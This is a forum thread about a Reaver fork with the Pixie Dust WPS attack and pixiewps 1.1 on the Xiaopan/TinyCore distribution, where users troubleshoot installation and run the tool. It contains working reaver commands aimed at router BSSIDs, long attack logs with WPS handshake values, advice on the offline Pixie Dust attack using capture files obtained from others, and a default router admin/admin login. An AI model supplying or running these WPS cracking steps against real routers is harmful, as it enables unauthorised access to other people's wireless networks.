reaver fork with pixie dust 1.1a

Latest attack for WPS devices come to tinycore and Xiaopan

  1. reyman76

    reyman76 Well-Known Member
    VIP

    Joined:
    29 Jan 2013
    Messages:
    257
    Likes Received:
    37
    sorry for out of topic...before is ok...but now when i try connect a wifi network i get this(look at picture)...anyone know something about this? thankz....
     

    Attached Files:

  2. meknb

    meknb Mod
    Moderator Dev Team VIP

    Joined:
    2 Jun 2012
    Messages:
    702
    Likes Received:
    203
    Looks like your trying to log into a intranet, you would need the admin password to access internet "if they have any?" or the local computers on the intranet.
    Ps yes you are off topic.
    This router can be used as a extender also default login is admin pass admin on 192.168.1.1
     
    #22 meknb, 1 May 2015
    Last edited: 1 May 2015
    • Like Like x 1
  3. meknb

    meknb Mod
    Moderator Dev Team VIP

    Joined:
    2 Jun 2012
    Messages:
    702
    Likes Received:
    203
    Pixiewps 1.1

    https://github.com/wiire/pixiewps

    What's new:
    - The previous attack now is fully implemented
    - AuthKey computation if --dh-small is specified (also in Reaver). The data can be gathered from a .cap file (manually)
    - Better input parsing with parameters length check
    - More user friendly. Added some examples of use in the usage screen.
     
    • Like Like x 1
  4. johan123

    johan123 New Member

    Joined:
    1 May 2015
    Messages:
    2
    Likes Received:
    0
    can anyone help please? i have xiaopan 0.4.7.2 on USB DRIVE
    i put reaverfork and pixiewps tcz into optional
    i add them both to onboot.lst
    i start xiaopan with USB
    i get error
    touch: usr/local pixiewps.tcz permission denied
    touch: usr/local reaverfork.tcz permission denied
     
  5. meknb

    meknb Mod
    Moderator Dev Team VIP

    Joined:
    2 Jun 2012
    Messages:
    702
    Likes Received:
    203
    Does it say this on boot ???
    What's your file permissions say
    Code:
    Select All
    ls -l usr/local/pixiewps.tcz
    might need to change ownership
    Code:
    Select All
    chown tc:staff NameOfFile.tcz
     
    #25 meknb, 2 May 2015
    Last edited: 2 May 2015
  6. meknb

    meknb Mod
    Moderator Dev Team VIP

    Joined:
    2 Jun 2012
    Messages:
    702
    Likes Received:
    203
    meknb updated PixieWPS & Reaver (by Meknb) with a new update entry:

    Version 1.1

    Read the rest of this update entry...
     
  7. johan123

    johan123 New Member

    Joined:
    1 May 2015
    Messages:
    2
    Likes Received:
    0
    thanks. exellent works!
    is it posible to use new version for offline attack if you have cap file but you are not at same location as AP?
    if someone send me a cap file what command in pixiewps can i use to get pin?
     
  8. gearjunkie

    gearjunkie Well-Known Member
    VIP

    Joined:
    28 Aug 2014
    Messages:
    454
    Likes Received:
    481
    Theoretically you could but the authkey value will have to be calculated and it is not an easy task. I would suggest you get someone to run the modded reaver instead as it will print out all the values that you need for pixiewps.
     
  9. BobMarley

    BobMarley Active Member

    Joined:
    10 Mar 2015
    Messages:
    29
    Likes Received:
    8
  10. meknb

    meknb Mod
    Moderator Dev Team VIP

    Joined:
    2 Jun 2012
    Messages:
    702
    Likes Received:
    203
    If you didn't get the e-hash then now it didn't.
    But your question is so vague all we can do is guess,what command was used? what script? the questions keep going
    Be more descriptive you might get a answer.
     
  11. BobMarley

    BobMarley Active Member

    Joined:
    10 Mar 2015
    Messages:
    29
    Likes Received:
    8
    sorry . command i use - reaver -i mon0 -b XX:XX:XX:XX:XX:XX -c X -vv -S

    Reaver v1.5.2 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
    mod by t6_x <[email protected]> & DataHead & Soxrok2212 & Wiire

    [+] Switching mon0 to channel 5
    [+] Waiting for beacon from XX:XX:XX:XX:XX:XX
    [+] Associated with XX:XX:XX:XX:XX:XX (ESSID: blahblah)
    [+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
    [+] Trying pin 12345670.
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [P] E-Nonce: 4e:9c:4e:95:62:47:89:23:22:ca:bd:68:56:f1:53:f1
    [P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b
    [P] WPS Manufacturer: "L7 Corporation."
    [P] WPS Model Name: "L7-N-R2000"
    [P] WPS Model Number: "A1"
    [P] Access Point Serial Number: "123456789012347"
    [+] Received M1 message
    [P] R-Nonce: a0:10:36:2b:b0:82:9a:53:4d:08:7f:ef:5a:13:8a:52
    [P] PKR: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:02
    [P] AuthKey: 77:6f:0f:aa:32:95:cd:07:eb:3d:a6:4d:97:49:07:0c:92:db:3e:84:87:6c:64:72:c9:92:fc:34:f3:26:c5:0f
    [+] Sending M2 message
    [+] Received WSC NACK
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x04), re-trying last pin
    [+] Trying pin 12345670.
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [P] E-Nonce: 2a:62:c0:76:0b:df:b9:91:30:31:ff:c3:28:ee:84:77
    [P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b
    [P] WPS Manufacturer: "L7 Corporation."
    [P] WPS Model Name: "L7-N-R2000"
    [P] WPS Model Number: "A1"
    [P] Access Point Serial Number: "123456789012347"
    [+] Received M1 message
    [P] R-Nonce: 1d:6b:38:ca:8a:71:5a:3b:9a:57:f6:06:e4:1f:4a:f5
    [P] PKR: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:02
    [P] AuthKey: eb:60:36:4c:97:5e:df:a4:f7:42:74:ed:4f:b5:92:68:83:f0:6a:1d:0e:d7:d8:df:a4:f3:f7:d0:e3:7e:3d:a3
    [+] Sending M2 message
    [+] Received WSC NACK
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x04), re-trying last pin
    [+] Trying pin 12345670.
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [P] E-Nonce: 06:06:92:6b:35:70:9e:38:3d:67:34:bc:3a:be:fc:43
    [P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b
    [P] WPS Manufacturer: "L7 Corporation."
    [P] WPS Model Name: "L7-N-R2000"
    [P] WPS Model Number: "A1"
    [P] Access Point Serial Number: "123456789012347"
    [+] Received M1 message
    [P] R-Nonce: aa:65:6a:23:8e:46:3f:d0:6c:91:cf:35:1e:36:cf:ba
    [P] PKR: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:02
    [P] AuthKey: d9:55:49:e8:f8:79:78:a4:50:dd:bf:59:e2:e5:ba:0b:bf:38:1b:eb:bb:d3:12:86:90:ba:92:66:b6:bf:b5:27
    [+] Sending M2 message
    [+] Received WSC NACK
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x04), re-trying last pin

    keep trying the same thing .
     
  12. meknb

    meknb Mod
    Moderator Dev Team VIP

    Joined:
    2 Jun 2012
    Messages:
    702
    Likes Received:
    203
    What you get without the -dh-small the -S option your not meant to use small keys against realtek routers.
     
  13. BobMarley

    BobMarley Active Member

    Joined:
    10 Mar 2015
    Messages:
    29
    Likes Received:
    8
    i try another command , reaver -i mon0 -b XX:XX:XX:XX:XX:XX -vv -K 1 ,

    same thing , nothing change .
     
  14. meknb

    meknb Mod
    Moderator Dev Team VIP

    Joined:
    2 Jun 2012
    Messages:
    702
    Likes Received:
    203
    I take it it's your router whats your signal strength ?
    Are you using reaver from here "need's updating really"
    It wouldn't be the same your PKR would be different
     
    #34 meknb, 30 May 2015
    Last edited: 2 Jun 2015
  15. meknb

    meknb Mod
    Moderator Dev Team VIP

    Joined:
    2 Jun 2012
    Messages:
    702
    Likes Received:
    203
    Updated pixiewps and reaver as of 1st June
     

    Attached Files:

  16. Mr. Penguin

    Mr. Penguin Administrator
    Staff Member VIP Admin

    Joined:
    18 May 2012
    Messages:
    3,093
    Likes Received:
    1,268
  17. Jaseela Thas

    Jaseela Thas Active Member

    Joined:
    7 Feb 2014
    Messages:
    1
    Likes Received:
    0
    HI,

    I Am Running from USB Please help me to solve this error.

    touch: usr/local pixiewps.tcz permission denied
    touch: usr/local reaverfork.tcz permission denied


    Am pretty noob at giving permission please guide me what to do.
     

Share This Page

Loading...